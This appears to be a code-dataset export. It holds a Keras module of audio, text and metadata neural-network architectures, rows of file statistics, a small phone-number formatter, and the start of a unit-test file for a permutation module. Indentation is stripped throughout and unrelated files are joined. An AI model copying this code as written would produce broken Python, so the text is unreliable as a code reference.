# AUDIO ARCH CNNs
def get_model_1(params):
model = Sequential()
model.add(Convolution2D(params["n_filters_1"], params["n_kernel_1"][0],
params["n_kernel_1"][1],
border_mode='valid',
input_shape=(1, params["n_frames"],
params["n_mel"]),
init="uniform"))
#model.add(BatchNormalization())
model.add(Activation("relu"))
logging.debug("Input CNN: %s" % str(model.input_shape))
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_1"][0],
params["n_pool_1"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
model.add(Convolution2D(params["n_filters_2"], params["n_kernel_2"][0],
params["n_kernel_2"][1],
border_mode='valid',
init="uniform"))
#model.add(BatchNormalization())
model.add(Activation("relu"))
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_2"][0],
params["n_pool_2"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
if params["n_filters_3"] > 0:
model.add(Convolution2D(params["n_filters_3"],
params["n_kernel_3"][0],
params["n_kernel_3"][1],
border_mode='valid',
init="uniform"))
#model.add(BatchNormalization())
model.add(Activation("relu"))
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_3"][0],
params["n_pool_3"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
if params["n_filters_4"] > 0:
model.add(Convolution2D(params["n_filters_4"],
params["n_kernel_4"][0],
params["n_kernel_4"][1],
border_mode='valid',
init="uniform"))
model.add(Activation("relu"))
#model.add(BatchNormalization())
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_4"][0],
params["n_pool_4"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
if params["n_filters_5"] > 0:
model.add(Convolution2D(params["n_filters_5"],
params["n_kernel_5"][0],
params["n_kernel_5"][1],
border_mode='valid',
init="uniform"))
model.add(Activation("relu"))
#model.add(BatchNormalization())
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_5"][0],
params["n_pool_5"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
model.add(Flatten())
logging.debug("Output Flatten: %s" % str(model.output_shape))
#model.add(Dropout(params["dropout_factor"]))
if params["n_dense"] > 0:
model.add(Dense(output_dim=params["n_dense"], init="uniform"))
model.add(Activation("relu"))
model.add(Dropout(params["dropout_factor"]))
logging.debug("Output Dense: %s" % str(model.output_shape))
model.add(Dense(output_dim=params["n_dense"], init="uniform"))
model.add(Activation("relu"))
model.add(Dropout(params["dropout_factor"]))
logging.debug("Output Dense: %s" % str(model.output_shape))
model.add(Dense(output_dim=params["n_out"], init="uniform"))
model.add(Activation(params["final_activation"]))
logging.debug("Output CNN: %s" % str(model.output_shape))
if params['final_activation'] == 'linear':
model.add(Lambda(lambda x :K.l2_normalize(x, axis=1)))
return model
# Audio ARCH with graph api
def get_model_11(params):
inputs = Input(shape=(1, params["n_frames"],
params["n_mel"]), name='input')
conv1 = Convolution2D(params["n_filters_1"], params["n_kernel_1"][0],
params["n_kernel_1"][1],
border_mode='valid',
activation='relu',
input_shape=(1, params["n_frames"],
params["n_mel"]),
init="uniform")
x = conv1(inputs)
#logging.debug("Input CNN: %s" % str(inputs.output_shape))
logging.debug("Output Conv2D: %s" % str(conv1.output_shape))
pool1 = MaxPooling2D(pool_size=(params["n_pool_1"][0],
params["n_pool_1"][1]))
x = pool1(x)
logging.debug("Output MaxPool2D: %s" % str(pool1.output_shape))
x = Dropout(params["dropout_factor"])(x)
conv2 = Convolution2D(params["n_filters_2"], params["n_kernel_2"][0],
params["n_kernel_2"][1],
border_mode='valid',
activation='relu',
init="uniform")
x = conv2(x)
logging.debug("Output Conv2D: %s" % str(conv2.output_shape))
pool2 = MaxPooling2D(pool_size=(params["n_pool_2"][0],
params["n_pool_2"][1]))
x = pool2(x)
logging.debug("Output MaxPool2D: %s" % str(pool2.output_shape))
x = Dropout(params["dropout_factor"])(x)
#model.add(Permute((3,2,1)))
conv3 = Convolution2D(params["n_filters_3"],
params["n_kernel_3"][0],
params["n_kernel_3"][1],
activation='relu',
init="uniform")
x = conv3(x)
logging.debug("Output Conv2D: %s" % str(conv3.output_shape))
pool3 = MaxPooling2D(pool_size=(params["n_pool_3"][0],
params["n_pool_3"][1]))
x = pool3(x)
logging.debug("Output MaxPool2D: %s" % str(pool3.output_shape))
x = Dropout(params["dropout_factor"])(x)
conv4 = Convolution2D(params["n_filters_4"],
params["n_kernel_4"][0],
params["n_kernel_4"][1],
activation='relu',
init="uniform")
x = conv4(x)
logging.debug("Output Conv2D: %s" % str(conv4.output_shape))
pool4 = MaxPooling2D(pool_size=(params["n_pool_4"][0],
params["n_pool_4"][1]))
x = pool4(x)
logging.debug("Output MaxPool2D: %s" % str(pool4.output_shape))
x = Dropout(params["dropout_factor"])(x)
flat = Flatten(name='flat')
xflat = flat(x)
logging.debug("Output Flatten: %s" % str(flat.output_shape))
#dense1 = Dense(output_dim=params["n_dense"], init="uniform", activation='linear')
#x = dense1(x)
#logging.debug("Output CNN: %s" % str(dense1.output_shape))
dense3 = Dense(output_dim=params["n_out"], init="uniform", activation='linear')
xout = dense3(xflat)
logging.debug("Output CNN: %s" % str(dense3.output_shape))
lambda1 = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = lambda1(xout)
model = Model(input=inputs, output=xout)
return model
# AUDIO multiple filters
def get_model_12(params):
graph_in = Input(shape=(1, params["n_frames"],params["n_mel"]))
convs = []
params['filter_sizes'] = [(1,70),(5,70),(10,70),(1,35),(5,35),(10,35)]
params['filter_widths'] = [64,32,32,64,32,32]
for i,fsz in enumerate(params['filter_sizes']):
conv = Convolution2D(params['filter_widths'][i],fsz[0],fsz[1],
border_mode='same',
activation='relu',
init='uniform')
x = conv(graph_in)
logging.debug("Filter size: %s,%s" % (fsz[0],fsz[1]))
logging.debug("Output CNN: %s" % str(conv.output_shape))
convs.append(x)
if len(params['filter_sizes'])>1:
merge1 = Merge(mode='concat',concat_axis=1)
out = merge1(convs)
logging.debug("Merge: %s" % str(merge1.output_shape))
else:
out = convs[0]
graph = Model(input=graph_in, output=out)
model = Sequential()
model.add(graph)
model.add(MaxPooling2D(pool_size=(params["n_pool_1"][0],
params["n_pool_1"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
#model.add(Permute((3,2,1)))
model.add(Convolution2D(params["n_filters_2"], params["n_kernel_2"][0],
params["n_kernel_2"][1],
border_mode='valid',
init="uniform"))
#model.add(BatchNormalization())
model.add(Activation("relu"))
#logging.debug("Input CNN: %s" % str(model.input_shape))
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_2"][0],
params["n_pool_2"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
#model.add(Permute((3,2,1)))
if params["n_filters_3"] > 0:
model.add(Convolution2D(params["n_filters_3"],
params["n_kernel_3"][0],
params["n_kernel_3"][1],
border_mode='valid',
init="uniform"))
#model.add(BatchNormalization())
model.add(Activation("relu"))
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_3"][0],
params["n_pool_3"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
if params["n_filters_4"] > 0:
model.add(Convolution2D(params["n_filters_4"],
params["n_kernel_4"][0],
params["n_kernel_4"][1],
border_mode='valid',
init="uniform"))
model.add(Activation("relu"))
#model.add(BatchNormalization())
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_4"][0],
params["n_pool_4"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
if params["n_filters_5"] > 0:
model.add(Convolution2D(params["n_filters_5"],
params["n_kernel_5"][0],
params["n_kernel_5"][1],
border_mode='valid',
init="uniform"))
model.add(Activation("relu"))
#model.add(BatchNormalization())
logging.debug("Output Conv2D: %s" % str(model.output_shape))
model.add(MaxPooling2D(pool_size=(params["n_pool_5"][0],
params["n_pool_5"][1])))
logging.debug("Output MaxPool2D: %s" % str(model.output_shape))
model.add(Dropout(params["dropout_factor"]))
model.add(Flatten())
logging.debug("Output Flatten: %s" % str(model.output_shape))
#model.add(Dropout(params["dropout_factor"]))
if params["n_dense"] > 0:
model.add(Dense(output_dim=params["n_dense"], init="uniform"))
model.add(Activation("relu"))
model.add(Dropout(params["dropout_factor"]))
logging.debug("Output Dense: %s" % str(model.output_shape))
model.add(Dense(output_dim=params["n_dense"], init="uniform"))
model.add(Activation("relu"))
model.add(Dropout(params["dropout_factor"]))
logging.debug("Output Dense: %s" % str(model.output_shape))
model.add(Dense(output_dim=params["n_out"], init="uniform"))
model.add(Activation(params["final_activation"]))
logging.debug("Output CNN: %s" % str(model.output_shape))
if params['final_activation'] == 'linear':
model.add(Lambda(lambda x :K.l2_normalize(x, axis=1)))
return model
# Multimodal ARCH text + audio
def get_model_2(params):
inputs = Input(shape=(1, params["n_frames"],
params["n_mel"]))
conv1 = Convolution2D(params["n_filters_1"], params["n_kernel_1"][0],
params["n_kernel_1"][1],
border_mode='valid',
activation='relu',
input_shape=(1, params["n_frames"],
params["n_mel"]),
init="uniform")
x = conv1(inputs)
#logging.debug("Input CNN: %s" % str(inputs.output_shape))
logging.debug("Output Conv2D: %s" % str(conv1.output_shape))
pool1 = MaxPooling2D(pool_size=(params["n_pool_1"][0],
params["n_pool_1"][1]))
x = pool1(x)
logging.debug("Output MaxPool2D: %s" % str(pool1.output_shape))
x = Dropout(params["dropout_factor"])(x)
conv2 = Convolution2D(params["n_filters_2"], params["n_kernel_2"][0],
params["n_kernel_2"][1],
border_mode='valid',
activation='relu',
init="uniform")
x = conv2(x)
logging.debug("Output Conv2D: %s" % str(conv2.output_shape))
pool2 = MaxPooling2D(pool_size=(params["n_pool_2"][0],
params["n_pool_2"][1]))
x = pool2(x)
logging.debug("Output MaxPool2D: %s" % str(pool2.output_shape))
x = Dropout(params["dropout_factor"])(x)
#model.add(Permute((3,2,1)))
conv3 = Convolution2D(params["n_filters_3"],
params["n_kernel_3"][0],
params["n_kernel_3"][1],
activation='relu',
init="uniform")
x = conv3(x)
logging.debug("Output Conv2D: %s" % str(conv3.output_shape))
pool3 = MaxPooling2D(pool_size=(params["n_pool_3"][0],
params["n_pool_3"][1]))
x = pool3(x)
logging.debug("Output MaxPool2D: %s" % str(pool3.output_shape))
x = Dropout(params["dropout_factor"])(x)
conv4 = Convolution2D(params["n_filters_4"],
params["n_kernel_4"][0],
params["n_kernel_4"][1],
activation='relu',
init="uniform")
x = conv4(x)
logging.debug("Output Conv2D: %s" % str(conv4.output_shape))
pool4 = MaxPooling2D(pool_size=(params["n_pool_4"][0],
params["n_pool_4"][1]))
x = pool4(x)
logging.debug("Output MaxPool2D: %s" % str(pool4.output_shape))
x = Dropout(params["dropout_factor"])(x)
flat = Flatten()
x = flat(x)
logging.debug("Output Flatten: %s" % str(flat.output_shape))
#dense1 = Dense(output_dim=params["n_dense"], init="uniform", activation='linear')
#x = dense1(x)
#logging.debug("Output CNN: %s" % str(dense1.output_shape))
# metadata
inputs2 = Input(shape=(params["n_metafeatures"],))
dense2 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
x2 = dense2(inputs2)
logging.debug("Output CNN: %s" % str(dense2.output_shape))
x2 = Dropout(params["dropout_factor"])(x2)
# merge
xout = merge([x, x2], mode='concat', concat_axis=1)
dense3 = Dense(output_dim=params["n_out"], init="uniform", activation='linear')
xout = dense3(xout)
logging.debug("Output CNN: %s" % str(dense3.output_shape))
lambda1 = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = lambda1(xout)
model = Model(input=[inputs,inputs2], output=xout)
return model
# METADATA ARCH
def get_model_3(params):
# metadata
inputs2 = Input(shape=(params["n_metafeatures"],))
x2 = Dropout(params["dropout_factor"])(inputs2)
if params["n_dense"] > 0:
dense2 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
x2 = dense2(x2)
logging.debug("Output CNN: %s" % str(dense2.output_shape))
x2 = Dropout(params["dropout_factor"])(x2)
if params["n_dense_2"] > 0:
dense3 = Dense(output_dim=params["n_dense_2"], init="uniform", activation='relu')
x2 = dense3(x2)
logging.debug("Output CNN: %s" % str(dense3.output_shape))
x2 = Dropout(params["dropout_factor"])(x2)
dense4 = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
xout = dense4(x2)
logging.debug("Output CNN: %s" % str(dense4.output_shape))
if params['final_activation'] == 'linear':
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = reg(xout)
model = Model(input=inputs2, output=xout)
return model
# Metadata 2 inputs, post-merge with dense layers
def get_model_31(params):
# metadata
inputs = Input(shape=(params["n_metafeatures"],))
norm = BatchNormalization()
x = norm(inputs)
x = Dropout(params["dropout_factor"])(x)
dense = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
x = dense(x)
logging.debug("Output CNN: %s" % str(dense.output_shape))
x = Dropout(params["dropout_factor"])(x)
inputs2 = Input(shape=(params["n_metafeatures2"],))
norm2 = BatchNormalization()
x2 = norm2(inputs2)
x2 = Dropout(params["dropout_factor"])(x2)
dense2 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
x2 = dense2(x2)
logging.debug("Output CNN: %s" % str(dense2.output_shape))
x2 = Dropout(params["dropout_factor"])(x2)
# merge
xout = merge([x, x2], mode='concat', concat_axis=1)
dense4 = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
xout = dense4(xout)
logging.debug("Output CNN: %s" % str(dense4.output_shape))
if params['final_activation'] == 'linear':
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = reg(xout)
model = Model(input=[inputs,inputs2], output=xout)
return model
# Metadata 2 inputs, pre-merge and l2
def get_model_32(params):
# metadata
inputs = Input(shape=(params["n_metafeatures"],))
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
x1 = reg(inputs)
inputs2 = Input(shape=(params["n_metafeatures2"],))
reg2 = Lambda(lambda x :K.l2_normalize(x, axis=1))
x2 = reg2(inputs2)
# merge
x = merge([x1, x2], mode='concat', concat_axis=1)
x = Dropout(params["dropout_factor"])(x)
if params['n_dense'] > 0:
dense2 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
x = dense2(x)
logging.debug("Output CNN: %s" % str(dense2.output_shape))
dense4 = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
xout = dense4(x)
logging.debug("Output CNN: %s" % str(dense4.output_shape))
if params['final_activation'] == 'linear':
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = reg(xout)
model = Model(input=[inputs,inputs2], output=xout)
return model
# Metadata 3 inputs, pre-merge and l2
def get_model_33(params):
# metadata
inputs = Input(shape=(params["n_metafeatures"],))
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
x1 = reg(inputs)
inputs2 = Input(shape=(params["n_metafeatures2"],))
reg2 = Lambda(lambda x :K.l2_normalize(x, axis=1))
x2 = reg2(inputs2)
inputs3 = Input(shape=(params["n_metafeatures3"],))
reg3 = Lambda(lambda x :K.l2_normalize(x, axis=1))
x3 = reg3(inputs3)
# merge
x = merge([x1, x2, x3], mode='concat', concat_axis=1)
x = Dropout(params["dropout_factor"])(x)
if params['n_dense'] > 0:
dense2 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
x = dense2(x)
logging.debug("Output CNN: %s" % str(dense2.output_shape))
dense4 = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
xout = dense4(x)
logging.debug("Output CNN: %s" % str(dense4.output_shape))
if params['final_activation'] == 'linear':
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = reg(xout)
model = Model(input=[inputs,inputs2,inputs3], output=xout)
return model
# Metadata 4 inputs, pre-merge and l2
def get_model_34(params):
# metadata
inputs = Input(shape=(params["n_metafeatures"],))
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
x1 = reg(inputs)
inputs2 = Input(shape=(params["n_metafeatures2"],))
reg2 = Lambda(lambda x :K.l2_normalize(x, axis=1))
x2 = reg2(inputs2)
inputs3 = Input(shape=(params["n_metafeatures3"],))
reg3 = Lambda(lambda x :K.l2_normalize(x, axis=1))
x3 = reg3(inputs3)
inputs4 = Input(shape=(params["n_metafeatures4"],))
reg4 = Lambda(lambda x :K.l2_normalize(x, axis=1))
x4 = reg4(inputs4)
# merge
x = merge([x1, x2, x3, x4], mode='concat', concat_axis=1)
x = Dropout(params["dropout_factor"])(x)
if params['n_dense'] > 0:
dense2 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
x = dense2(x)
logging.debug("Output CNN: %s" % str(dense2.output_shape))
dense4 = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
xout = dense4(x)
logging.debug("Output CNN: %s" % str(dense4.output_shape))
if params['final_activation'] == 'linear':
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = reg(xout)
model = Model(input=[inputs,inputs2,inputs3,inputs4], output=xout)
return model
params_w2v = {
# dataset params
'dataset' : {
'fact' : 'als',
'dim' : 200,
'dataset' : 'W2',
'window' : 15,
'nsamples' : 'all',
'npatches' : 1,
'meta-suffix' : ''
},
# training params
'training' : {
'decay' : 1e-6,
'learning_rate' : 0.1,
'momentum' : 0.95,
'n_epochs' : 100,
'n_minibatch' : 32,
'nesterov' : True,
'validation' : 0.1,
'test' : 0.1,
'loss_func' : 'cosine',
'optimizer' : 'sgd'
},
# cnn params
'cnn' : {
'dropout_factor' : 0.5,
'sequence_length' : 500,
'embedding_dim' : 300,
'filter_sizes' : (2, 3),
'num_filters' : 150,
'dropout_prob' : (0.5, 0.8),
'hidden_dims' : 2048,
'batch_size' : 32,
'num_epochs' : 100,
'val_split' : 0.1,
'model_variation' : 'CNN-rnd',
'n_out' : 200,
'n_frames' : '',
'n_mel' : 96,
'architecture' : 82,
'n_metafeatures' : 7927,#5393
'final_activation' : 'linear'
},
'predicting' : {
'trim_coeff' : 0.15
},
'evaluating' : {
'get_map' : False,
'get_p' : True,
'get_knn' : False
}
}
# word2vec ARCH with CNNs
def get_model_4(params):
embedding_weights = pickle.load(open(common.TRAINDATA_DIR+"/embedding_weights_w2v_%s.pk" % params['embeddings_suffix'],"rb"))
graph_in = Input(shape=(params['sequence_length'], params['embedding_dim']))
convs = []
for fsz in params['filter_sizes']:
conv = Convolution1D(nb_filter=params['num_filters'],
filter_length=fsz,
border_mode='valid',
activation='relu',
subsample_length=1)
x = conv(graph_in)
logging.debug("Filter size: %s" % fsz)
logging.debug("Output CNN: %s" % str(conv.output_shape))
pool = GlobalMaxPooling1D()
x = pool(x)
logging.debug("Output Pooling: %s" % str(pool.output_shape))
convs.append(x)
if len(params['filter_sizes'])>1:
merge = Merge(mode='concat')
out = merge(convs)
logging.debug("Merge: %s" % str(merge.output_shape))
else:
out = convs[0]
graph = Model(input=graph_in, output=out)
# main sequential model
model = Sequential()
if not params['model_variation']=='CNN-static':
model.add(Embedding(len(embedding_weights[0]), params['embedding_dim'], input_length=params['sequence_length'],
weights=embedding_weights))
model.add(Dropout(params['dropout_prob'][0], input_shape=(params['sequence_length'], params['embedding_dim'])))
model.add(graph)
model.add(Dense(params['n_dense']))
model.add(Dropout(params['dropout_prob'][1]))
model.add(Activation('relu'))
model.add(Dense(output_dim=params["n_out"], init="uniform"))
model.add(Activation(params['final_activation']))
logging.debug("Output CNN: %s" % str(model.output_shape))
if params['final_activation'] == 'linear':
model.add(Lambda(lambda x :K.l2_normalize(x, axis=1)))
return model
# word2vec ARCH with LSTM
def get_model_41(params):
embedding_weights = pickle.load(open("../data/datasets/train_data/embedding_weights_w2v-google_MSD-AG.pk","rb"))
# main sequential model
model = Sequential()
model.add(Embedding(len(embedding_weights[0]), params['embedding_dim'], input_length=params['sequence_length'],
weights=embedding_weights))
#model.add(Dropout(params['dropout_prob'][0], input_shape=(params['sequence_length'], params['embedding_dim'])))
model.add(LSTM(2048))
#model.add(Dropout(params['dropout_prob'][1]))
model.add(Dense(output_dim=params["n_out"], init="uniform"))
model.add(Activation(params['final_activation']))
logging.debug("Output CNN: %s" % str(model.output_shape))
if params['final_activation'] == 'linear':
model.add(Lambda(lambda x :K.l2_normalize(x, axis=1)))
return model
# CRNN Arch for audio
def get_model_5(params):
input_tensor=None
include_top=True
# Determine proper input shape
if K.image_dim_ordering() == 'th':
input_shape = (1, 96, 1366)
else:
input_shape = (96, 1366, 1)
if input_tensor is None:
melgram_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
melgram_input = Input(tensor=input_tensor, shape=input_shape)
else:
melgram_input = input_tensor
# Determine input axis
if K.image_dim_ordering() == 'th':
channel_axis = 1
freq_axis = 2
time_axis = 3
else:
channel_axis = 3
freq_axis = 1
time_axis = 2
# Input block
x = ZeroPadding2D(padding=(0, 37))(melgram_input)
x = BatchNormalization(axis=freq_axis, name='bn_0_freq')(x)
x = Permute((1, 3, 2))(x)
# Conv block 1
x = Convolution2D(64, 3, 3, border_mode='same', name='conv1')(x)
x = BatchNormalization(axis=channel_axis, mode=0, name='bn1')(x)
x = ELU()(x)
x = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(x)
x = Dropout(0.1, name='dropout1')(x)
# Conv block 2
x = Convolution2D(128, 3, 3, border_mode='same', name='conv2')(x)
x = BatchNormalization(axis=channel_axis, mode=0, name='bn2')(x)
x = ELU()(x)
x = MaxPooling2D(pool_size=(3, 3), strides=(3, 3), name='pool2')(x)
x = Dropout(0.1, name='dropout2')(x)
# Conv block 3
x = Convolution2D(128, 3, 3, border_mode='same', name='conv3')(x)
x = BatchNormalization(axis=channel_axis, mode=0, name='bn3')(x)
x = ELU()(x)
x = MaxPooling2D(pool_size=(4, 4), strides=(4, 4), name='pool3')(x)
x = Dropout(0.1, name='dropout3')(x)
# Conv block 4
x = Convolution2D(128, 3, 3, border_mode='same', name='conv4')(x)
x = BatchNormalization(axis=channel_axis, mode=0, name='bn4')(x)
x = ELU()(x)
x = MaxPooling2D(pool_size=(4, 4), strides=(4, 4), name='pool4')(x)
x = Dropout(0.1, name='dropout4')(x)
# reshaping
if K.image_dim_ordering() == 'th':
x = Permute((3, 2, 1))(x)
x = Reshape((15, 128))(x)
# GRU block 1, 2, output
x = GRU(32, return_sequences=True, name='gru1')(x)
x = GRU(32, return_sequences=False, name='gru2')(x)
x = Dropout(0.3)(x)
if include_top:
x = Dense(params["n_out"], activation=params['final_activation'], name='output')(x)
if params['final_activation'] == 'linear':
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
x = reg(x)
# Create model
model = Model(melgram_input, x)
return model
# AUDIO Features
def get_model_6(params):
# metadata
inputs2 = Input(shape=(params["n_metafeatures"],))
#x2 = Dropout(params["dropout_factor"])(inputs2)
if params["n_dense"] > 0:
dense21 = Dense(output_dim=params["n_dense"], init="uniform", activation='relu')
x21 = dense21(inputs2)
logging.debug("Output CNN: %s" % str(dense21.output_shape))
dense22 = Dense(output_dim=params["n_dense"], init="uniform", activation='tanh')
x22 = dense22(inputs2)
logging.debug("Output CNN: %s" % str(dense22.output_shape))
dense23 = Dense(output_dim=params["n_dense"], init="uniform", activation='sigmoid')
x23 = dense23(inputs2)
logging.debug("Output CNN: %s" % str(dense23.output_shape))
# merge
x = merge([x21, x22, x23], mode='concat', concat_axis=1)
x2 = Dropout(params["dropout_factor"])(x)
if params["n_dense_2"] > 0:
dense3 = Dense(output_dim=params["n_dense_2"], init="uniform", activation='relu')
x2 = dense3(x2)
logging.debug("Output CNN: %s" % str(dense3.output_shape))
x2 = Dropout(params["dropout_factor"])(x2)
dense4 = Dense(output_dim=params["n_out"], init="uniform", activation=params['final_activation'])
xout = dense4(x2)
logging.debug("Output CNN: %s" % str(dense4.output_shape))
if params['final_activation'] == 'linear':
reg = Lambda(lambda x :K.l2_normalize(x, axis=1))
xout = reg(xout)
model = Model(input=inputs2, output=xout)
return model
def main():
pass
if __name__ == '__main__':
main()
| 34.984127
| 169
| 0.570357
| 4,059
| 33,060
| 4.474501
| 0.0712
| 0.061667
| 0.071358
| 0.054399
| 0.826286
| 0.808116
| 0.784991
| 0.772052
| 0.755754
| 0.717983
| 0
| 0.038885
| 0.2719
| 33,060
| 944
| 170
| 35.021186
| 0.715633
| 0.057108
| 0
| 0.700148
| 0
| 0
| 0.177562
| 0.003023
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020679
| false
| 0.001477
| 0.017725
| 0
| 0.057607
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f01dfee176cb2cddb90d8279a1acf9e8edc63e6
| 206
|
py
|
Python
|
6kyu/Create Phone Number.py
|
walkgo/codewars_tasks
|
4c0ab6f0e1d2181318fc15b12dd55ef565ecd223
|
[
"MIT"
] | null | null | null |
6kyu/Create Phone Number.py
|
walkgo/codewars_tasks
|
4c0ab6f0e1d2181318fc15b12dd55ef565ecd223
|
[
"MIT"
] | null | null | null |
6kyu/Create Phone Number.py
|
walkgo/codewars_tasks
|
4c0ab6f0e1d2181318fc15b12dd55ef565ecd223
|
[
"MIT"
] | null | null | null |
def create_phone_number(n):
return (f'({n[0]}{n[1]}{n[2]}) {n[3]}{n[4]}{n[5]}-{n[6]}{n[7]}{n[8]}{n[9]}')
# Best Practices
def create_phone_number(n):
print ("({}{}{}) {}{}{}-{}{}{}{}".format(*n))
| 25.75
| 80
| 0.475728
| 37
| 206
| 2.540541
| 0.567568
| 0.191489
| 0.297872
| 0.425532
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054645
| 0.11165
| 206
| 7
| 81
| 29.428571
| 0.459016
| 0.067961
| 0
| 0.5
| 0
| 0.25
| 0.463158
| 0.226316
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.25
| 0.75
| 0.25
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
8f694fbdc89b42f77436a3c37d0824105896218b
| 27,334
|
py
|
Python
|
ml4tc/machine_learning/permutation_test.py
|
NOAA-GSL/ml4tc
|
e9f8faa51e5bfb86b2a78648d7b1d0e61d09b6c0
|
[
"MIT"
] | null | null | null |
ml4tc/machine_learning/permutation_test.py
|
NOAA-GSL/ml4tc
|
e9f8faa51e5bfb86b2a78648d7b1d0e61d09b6c0
|
[
"MIT"
] | null | null | null |
ml4tc/machine_learning/permutation_test.py
|
NOAA-GSL/ml4tc
|
e9f8faa51e5bfb86b2a78648d7b1d0e61d09b6c0
|
[
"MIT"
] | null | null | null |
"""Unit tests for permutation.py."""
import unittest
import numpy
from ml4tc.utils import satellite_utils
from ml4tc.machine_learning import neural_net
from ml4tc.machine_learning import permutation
TOLERANCE = 1e-6
NUM_BUILTIN_SHIPS_LAG_TIMES = permutation.NUM_BUILTIN_SHIPS_LAG_TIMES
NUM_SHIPS_FORECAST_HOURS = permutation.NUM_SHIPS_FORECAST_HOURS
NUM_LAGGED_PREDICTORS = 17
NUM_FORECAST_PREDICTORS = 125
NUM_UNGRIDDED_SAT_PREDICTORS = 16
# The following constants are used to test _permute_values and
# _depermute_values.
PREDICTOR_MATRIX_GRIDDED_SAT = numpy.random.normal(
loc=0., scale=1., size=(10, 640, 480, 4, 1)
)
PREDICTOR_MATRIX_UNGRIDDED_SAT = numpy.random.normal(
loc=0., scale=1., size=(10, 4, NUM_UNGRIDDED_SAT_PREDICTORS)
)
PREDICTOR_MATRIX_SHIPS = numpy.random.normal(
loc=0., scale=1., size=(10, 3, 193)
)
TRAINING_OPTION_DICT = {
neural_net.SATELLITE_LAG_TIMES_KEY: numpy.array([0], dtype=int),
neural_net.SHIPS_PREDICTORS_LAGGED_KEY: ['a'] * NUM_LAGGED_PREDICTORS,
neural_net.SHIPS_PREDICTORS_FORECAST_KEY: ['b'] * NUM_FORECAST_PREDICTORS,
neural_net.SATELLITE_PREDICTORS_KEY: ['c'] * NUM_UNGRIDDED_SAT_PREDICTORS
}
MODEL_METADATA_DICT = {
neural_net.TRAINING_OPTIONS_KEY: TRAINING_OPTION_DICT
}
# The following constants are used to test _predictor_indices_to_metadata.
FIRST_RESULT_DICT = {
permutation.PERMUTED_MATRICES_KEY: numpy.array([0, 1, 2], dtype=int),
permutation.PERMUTED_VARIABLES_KEY: numpy.array([0, 10, 15], dtype=int)
}
FIRST_PREDICTOR_NAMES = [satellite_utils.BRIGHTNESS_TEMPERATURE_KEY, 'c', 'a']
SECOND_RESULT_DICT = {
permutation.PERMUTED_MATRICES_KEY: numpy.array([0, 1, 2], dtype=int),
permutation.PERMUTED_VARIABLES_KEY: numpy.array([0, 10, 100], dtype=int)
}
